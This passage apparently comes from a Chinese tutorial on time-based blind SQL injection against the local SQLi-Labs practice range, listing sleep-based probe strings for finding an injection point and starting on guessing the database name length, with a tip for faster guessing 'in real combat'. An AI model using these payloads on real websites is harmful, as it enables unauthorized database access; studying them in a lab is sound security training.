这里靶场我们还是以“SQLi-Labs”为实战来讲解吧!
一、判断注入点
常用的判断语句:
' and if(1=0,1, sleep(10)) --+
" and if(1=0,1, sleep(10)) --+
) and if(1=0,1, sleep(10)) --+
') and if(1=0,1, sleep(10)) --+
") and if(1=0,1, sleep(10)) --+
注入示例:
http://127.0.0.1/sqli-labs/Less-9/?id=1 ' and if(1=0,1, sleep(10)) --+
判断正确,显示you are in.......
判断失败,无显示
二、判断数据库名
1、查询数据库名长度
由于是本地测试,我知道数据库长度、名字等这些,所以用的是等号 =,实战中可以用大小于来进行一个判断,缩短时间。